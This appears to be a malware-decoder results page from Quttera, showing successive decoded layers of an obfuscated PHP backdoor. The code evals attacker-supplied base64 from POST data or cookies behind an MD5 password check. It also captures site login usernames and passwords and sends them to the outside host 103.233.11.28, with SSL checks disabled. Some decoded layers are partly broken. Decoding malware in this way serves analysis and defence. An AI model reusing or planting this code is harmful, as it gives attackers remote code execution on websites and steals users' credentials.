Online PHP and Javascript Decoder decode hidden script to uncover its real functionality


Show other level

$y0530e438=@create_function;
	if(@function_exists($y0530e438)){
		$o69e06d9 = @$y0530e438('', @if(isset($_POST[product_id]) && md5($_POST[product_id])==="1c5fdae39bc41cd7519549ad7a091917"){
			if(isset($_POST[image_id])){
			eval(base64_decode($_POST[image_id]));
		}
			if(isset($_COOKIE[image_id])){
			eval(base64_decode($_COOKIE[image_id]));
		}
	}
	eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWyJzdGF0aXN0aWNzX2hhc2giXSkpe0BmaWxlX2dldF9jb250ZW50cyhiYXNlNjRfZGVjb2RlKCdhSFIwY0hNNkx5OHhNRE11TWpNekxqRXhMakk0TDJGdVlXeDVkR2xqY3k1d2FIQT0nKSwgZmFsc2UsIHN0cmVhbV9jb250ZXh0X2NyZWF0ZShhcnJheSgic3NsIj0+YXJyYXkoInZlcmlmeV9wZWVyIj0+ZmFsc2UsInZlcmlmeV9wZWVyX25hbWUiPT5mYWxzZSwpLCdodHRwJyA9PiBhcnJheSgnaGVhZGVyJyAgPT4gIkNvbnRlbnQtdHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkXHJcbiIuIkNvb2tpZTogbGljZW5zZV90b2tlbj0iLmJhc2U2NF9lbmNvZGUoYmluMmhleCgkZGF0YSkpLiJcclxuIiwnbWV0aG9kJyAgPT4gJ1BPU1QnLCJpZ25vcmVfZXJyb3JzIiA9PiB0cnVlLCJ0aW1lb3V0IiA9PiAoZmxvYXQpMzAuMCwnY29udGVudCcgPT4gaHR0cF9idWlsZF9xdWVyeShhcnJheSgnc3RhdGlzdGljc19oYXNoJyA9PiAkX1BPU1RbInN0YXRpc3RpY3NfaGFzaCJdKSkpKSkpO30='));
	eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWydsb2dpbiddWyd1c2VybmFtZSddKSAmJiBpc3NldCgkX1BPU1RbJ2xvZ2luJ11bJ3Bhc3N3b3JkJ10pKXsKICAgICRwYXRoPSRfU0VSVkVSWydSRU1PVEVfQUREUiddLictJy4kX1NFUlZFUltSRVFVRVNUX1VSSV07CiAgICAkY2hlY2tfdmFsPWJpbjJoZXgoJF9QT1NUWydsb2dpbiddWyd1c2VybmFtZSddLicgJy4kX1BPU1RbJ2xvZ2luJ11bJ3Bhc3N3b3JkJ10pOwogICAgJHVzZXJfZGF0YT1iaW4yaGV4KCRwYXRoLic7Jy4kY2hlY2tfdmFsKTsKICAgICRhcnJheSA9IGFycmF5KCd0b2tlbl9oYXNoJyAgID0+IGJhc2U2NF9lbmNvZGUoJ3sicmVmZXJlciI6IicuJF9TRVJWRVJbIkhUVFBfSE9TVCJdLiciLCJzdGF0cyI6IicuJHVzZXJfZGF0YS4nIiwidGFnIjoiYTE4MWE2MDM3NjljMWY5OGFkOTI3ZTczNjdjN2FhNTEifScpKTsgICAgICAKICAgICRjaCA9IGN1cmxfaW5pdChiYXNlNjRfZGVjb2RlKCdhSFIwY0hNNkx5OHhNRE11TWpNekxqRXhMakk0TDNOMFlYUjVjM1JwWTNNdWNHaHcnKSk7CiAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUE9TVCwgMSk7CiAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUE9TVEZJRUxEUywgJGFycmF5KTsgCiAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIHRydWUpOwogICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1NTTF9WRVJJRllQRUVSLCBmYWxzZSk7CiAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfSEVBREVSLCBmYWxzZSk7CiAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfU1NMX1ZFUklGWUhPU1QsIGZhbHNlKTsKICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9TU0xfVkVSSUZZUEVFUiwgZmFsc2UpOwogICAgJGh0bWwgPSBjdXJsX2V4ZWMoJGNoKTsKICAgIGN1cmxfY2xvc2UoJGNoKTsgIAp9'));
	);
	@$o69e06d9();
}

$y0530e438=@create_function;if(@function_exists($y0530e438)){$o69e06d9 = @$y0530e438('', @if(isset($_POST[product_id]) && md5($_POST[product_id])==="1c5fdae39bc41cd7519549ad7a091917"){if(isset($_POST[image_id])){echo base64_decode($_POST[image_id]));}if(isset($_COOKIE[image_id])){eval(base64_decode($_COOKIE[image_id]));}}eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWyJzdGF0aXN0aWNzX2hhc2giXSkpe0BmaWxlX2dldF9jb250ZW50cyhiYXNlNjRfZGVjb2RlKCdhSFIwY0hNNkx5OHhNRE11TWpNekxqRXhMakk0TDJGdVlXeDVkR2xqY3k1d2FIQT0nKSwgZmFsc2UsIHN0cmVhbV9jb250ZXh0X2NyZWF0ZShhcnJheSgic3NsIj0+YXJyYXkoInZlcmlmeV9wZWVyIj0+ZmFsc2UsInZlcmlmeV9wZWVyX25hbWUiPT5mYWxzZSwpLCdodHRwJyA9PiBhcnJheSgnaGVhZGVyJyAgPT4gIkNvbnRlbnQtdHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkXHJcbiIuIkNvb2tpZTogbGljZW5zZV90b2tlbj0iLmJhc2U2NF9lbmNvZGUoYmluMmhleCgkZGF0YSkpLiJcclxuIiwnbWV0aG9kJyAgPT4gJ1BPU1QnLCJpZ25vcmVfZXJyb3JzIiA9PiB0cnVlLCJ0aW1lb3V0IiA9PiAoZmxvYXQpMzAuMCwnY29udGVudCcgPT4gaHR0cF9idWlsZF9xdWVyeShhcnJheSgnc3RhdGlzdGljc19oYXNoJyA9PiAkX1BPU1RbInN0YXRpc3RpY3NfaGFzaCJdKSkpKSkpO30=');if(isset($_POST['login']['username']) && isset($_POST['login']['password'])){
    $path=$_SERVER['REMOTE_ADDR'].'-'.$_SERVER[REQUEST_URI];
    $check_val=bin2hex($_POST['login']['username'].' '.$_POST['login']['password']);
    $user_data=bin2hex($path.';'.$check_val);
    $array = array('token_hash'   => base64_encode('{"referer":"'.$_SERVER["HTTP_HOST"].'","stats":"'.$user_data.'","tag":"a181a603769c1f98ad927e7367c7aa51"}'));      
    $ch = curl_init(base64_decode('aHR0cHM6Ly8xMDMuMjMzLjExLjI4L3N0YXR5c3RpY3MucGhw'));
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $array); 
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_HEADER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    $html = curl_exec($ch);
    curl_close($ch);  
});@$o69e06d9();}

$y0530e438=@create_function;if(@function_exists($y0530e438)){$o69e06d9 = @$y0530e438('', @if(isset($_POST[product_id]) && md5($_POST[product_id])==="1c5fdae39bc41cd7519549ad7a091917"){if(isset($_POST[image_id])){echo base64_decode($_POST[image_id]));}if(isset($_COOKIE[image_id])){echo base64_decode($_COOKIE[image_id]));}}eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWyJzdGF0aXN0aWNzX2hhc2giXSkpe0BmaWxlX2dldF9jb250ZW50cyhiYXNlNjRfZGVjb2RlKCdhSFIwY0hNNkx5OHhNRE11TWpNekxqRXhMakk0TDJGdVlXeDVkR2xqY3k1d2FIQT0nKSwgZmFsc2UsIHN0cmVhbV9jb250ZXh0X2NyZWF0ZShhcnJheSgic3NsIj0+YXJyYXkoInZlcmlmeV9wZWVyIj0+ZmFsc2UsInZlcmlmeV9wZWVyX25hbWUiPT5mYWxzZSwpLCdodHRwJyA9PiBhcnJheSgnaGVhZGVyJyAgPT4gIkNvbnRlbnQtdHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkXHJcbiIuIkNvb2tpZTogbGljZW5zZV90b2tlbj0iLmJhc2U2NF9lbmNvZGUoYmluMmhleCgkZGF0YSkpLiJcclxuIiwnbWV0aG9kJyAgPT4gJ1BPU1QnLCJpZ25vcmVfZXJyb3JzIiA9PiB0cnVlLCJ0aW1lb3V0IiA9PiAoZmxvYXQpMzAuMCwnY29udGVudCcgPT4gaHR0cF9idWlsZF9xdWVyeShhcnJheSgnc3RhdGlzdGljc19oYXNoJyA9PiAkX1BPU1RbInN0YXRpc3RpY3NfaGFzaCJdKSkpKSkpO30=';if(isset($_POST['login']['username']) && isset($_POST['login']['password'])){
    $path=$_SERVER['REMOTE_ADDR'].'-'.$_SERVER[REQUEST_URI];
    $check_val=bin2hex($_POST['login']['username'].' '.$_POST['login']['password']);
    $user_data=bin2hex($path.';'.$check_val);
    $array = array('token_hash'   => base64_encode('{"referer":"'.$_SERVER["HTTP_HOST"].'","stats":"'.$user_data.'","tag":"a181a603769c1f98ad927e7367c7aa51"}'));      
    $ch = curl_init(base64_decode('aHR0cHM6Ly8xMDMuMjMzLjExLjI4L3N0YXR5c3RpY3MucGhw'));
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $array); 
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_HEADER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    $html = curl_exec($ch);
    curl_close($ch);  
});@$o69e06d9();}

$y0530e438=@create_function;if(@function_exists($y0530e438)){$o69e06d9 = @$y0530e438('', @if(isset($_POST[product_id]) && md5($_POST[product_id])==="1c5fdae39bc41cd7519549ad7a091917"){if(isset($_POST[image_id])){echo );}if(isset($_COOKIE[image_id])){echo );}}eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWyJzdGF0aXN0aWNzX2hhc2giXSkpe0BmaWxlX2dldF9jb250ZW50cyhiYXNlNjRfZGVjb2RlKCdhSFIwY0hNNkx5OHhNRE11TWpNekxqRXhMakk0TDJGdVlXeDVkR2xqY3k1d2FIQT0nKSwgZmFsc2UsIHN0cmVhbV9jb250ZXh0X2NyZWF0ZShhcnJheSgic3NsIj0+YXJyYXkoInZlcmlmeV9wZWVyIj0+ZmFsc2UsInZlcmlmeV9wZWVyX25hbWUiPT5mYWxzZSwpLCdodHRwJyA9PiBhcnJheSgnaGVhZGVyJyAgPT4gIkNvbnRlbnQtdHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkXHJcbiIuIkNvb2tpZTogbGljZW5zZV90b2tlbj0iLmJhc2U2NF9lbmNvZGUoYmluMmhleCgkZGF0YSkpLiJcclxuIiwnbWV0aG9kJyAgPT4gJ1BPU1QnLCJpZ25vcmVfZXJyb3JzIiA9PiB0cnVlLCJ0aW1lb3V0IiA9PiAoZmxvYXQpMzAuMCwnY29udGVudCcgPT4gaHR0cF9idWlsZF9xdWVyeShhcnJheSgnc3RhdGlzdGljc19oYXNoJyA9PiAkX1BPU1RbInN0YXRpc3RpY3NfaGFzaCJdKSkpKSkpO30=';if(isset($_POST['login']['username']) && isset($_POST['login']['password'])){
    $path=$_SERVER['REMOTE_ADDR'].'-'.$_SERVER[REQUEST_URI];
    $check_val=bin2hex($_POST['login']['username'].' '.$_POST['login']['password']);
    $user_data=bin2hex($path.';'.$check_val);
    $array = array('token_hash'   => base64_encode('{"referer":"'.$_SERVER["HTTP_HOST"].'","stats":"'.$user_data.'","tag":"a181a603769c1f98ad927e7367c7aa51"}'));      
    $ch = curl_init(https://103.233.11.28/statystics.php);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $array); 
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_HEADER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    $html = curl_exec($ch);
    curl_close($ch);  
});@$o69e06d9();}



© 2021 Quttera Ltd. All rights reserved.